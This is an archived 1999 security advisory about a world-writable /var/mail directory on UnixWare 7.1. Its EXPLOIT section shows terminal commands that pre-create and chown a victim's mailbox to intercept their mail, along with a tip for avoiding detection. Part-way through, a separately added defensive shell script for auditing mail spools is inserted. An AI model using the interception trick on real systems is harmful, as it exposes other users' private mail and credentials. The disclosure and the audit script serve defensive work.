UnixWare read/modify users' mail

From: Brock Tellier (btellierat_private)
Date: Fri Dec 03 1999 - 20:03:43 PST


    Greetings,
    
    OVERVIEW
    Any user can read/modify others' mail.
    
    BACKGROUND
    Only UnixWare 7.1 was tested.
    
    DETAILS
    Imagine my surprise when I saw that /var/mail was mode 777.  As such, any
    user may create a file called /var/mail/<username> with a mode readable by
    him and trap all incoming mail.  Afraid of getting caught? chown the file
    to <username> (see my advisory on this subject), leaving it still
    world-readable, and no one will ever know who did it.
    
    All of this assumes, of course, that the user has not received any mail
    yet.  If you keep track of your /etc/passwd file, you can monitor for new
    entries and create the files as needed.
    
    This permissions problem obviously opens the door for all sorts of
    problems with symlinks and such.  I would imagine that some mail delivery
    programs which aren't as smart as sendmail will follow symlinks in
    /var/mail.
    
    And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG
    LIE:
    
    bash-2.02$ cat /usr/bin/mail
    #!/bin/sh
    cat > /dev/null
    exit 0
    bash-2.02$ 
    
    ;)
    
    EXPLOIT
    
    bash-2.02$ id
    uid=106(xnec) gid=1(other)
    bash-2.02$ pwd
    /var/mail
    bash-2.02$ touch btellier
    bash-2.02$ chown btellier btellier
    bash-2.02$ ls -la btellier
    -rw-r--r--    1 btellier other             0 Dec  4 07:54 btellier
    
    Now wait for btellier to get some mail...
    
    bash-2.02$ ls -la btellier
    -rw-r--r--    1 btellier other           410 Dec  4 07:55 btellier
    bash-2.02$ cat btellier
    >From root Sat Dec  4 07:55:29 1999
    Return-Path: root
    Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
    for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
    Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
    From: root@localhost
    Message-Id: <199912041355.HAA04842@localhost>
    Status: 
    X-Status: 
    X-SCO-PAD: XXXXXX
    X-SCO-UID: 1
    Content-Length: 52
    
    your ueber-secure password on 0wned.com is a@f9;se0
    bash-2.02$ 
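A defender-side audit for the conditions described above (a world-writable /var/mail, a mailbox pre-created by someone other than the user it is named after, a mailbox left world-readable, and symlinks in the spool), as an added example that is not part of Brock's advisory. It assumes GNU coreutils `stat` and that the only legitimate group access is by a group named `mail`; the function name and the finding format are my own.

```sh
# Audit a mail spool directory for the weaknesses described in the advisory:
#   - directory world-writable without the sticky bit (any user can create
#     or rename others' mailboxes, as with /var/mail mode 777)
#   - a mailbox that is a symlink (a naive delivery agent may follow it)
#   - a mailbox whose owner is not the user it is named after
#   - a mailbox accessible by others, or by a group other than "mail"
# Assumes GNU coreutils stat (-c). Prints one finding per line and returns
# 0 when clean, 1 when anything was reported.
audit_mail_spool() {
    spool=$1
    rc=0

    # %a prints e.g. 777 or 1777 (no leading zero). 'other' is the last octal
    # digit; the special digit (setuid=4, setgid=2, sticky=1) is the thousands.
    dmode=$(stat -c '%a' "$spool")
    if [ $(( dmode % 10 & 2 )) -ne 0 ] && [ $(( dmode / 1000 & 1 )) -eq 0 ]; then
        echo "DIR $spool mode $dmode: world-writable without sticky bit"
        rc=1
    fi

    for box in "$spool"/*; do
        [ -e "$box" ] || [ -L "$box" ] || continue   # empty dir: glob unexpanded
        name=${box##*/}
        if [ -L "$box" ]; then
            echo "SYMLINK $box -> $(readlink "$box")"
            rc=1
            continue
        fi
        set -- $(stat -c '%a %U %G' "$box")          # mode owner group
        fmode=$1 owner=$2 group=$3
        if [ "$owner" != "$name" ]; then
            echo "OWNER $box: owned by $owner, expected $name"
            rc=1
        fi
        if [ $(( fmode % 10 )) -ne 0 ]; then
            echo "PERMS $box mode $fmode: accessible by others"
            rc=1
        elif [ $(( fmode / 10 % 10 )) -ne 0 ] && [ "$group" != "mail" ]; then
            echo "PERMS $box mode $fmode: accessible by group $group"
            rc=1
        fi
    done
    return $rc
}

# Run directly as: sh audit_spool.sh /var/mail
if [ $# -eq 1 ]; then
    audit_mail_spool "$1"
fi
```

On the system in the post, the pre-created btellier mailbox would be reported by the PERMS check (mode 644) even after the chown trick, and by the OWNER check if it was not chowned.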
    
    Brock Tellier
    UNIX Systems Administrator
    Chicago, IL, USA
    btellierat_private
    
    ____________________________________________________________________
    Get free email and a permanent address at http://www.netaddress.com/?N=1
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:16:58 PDT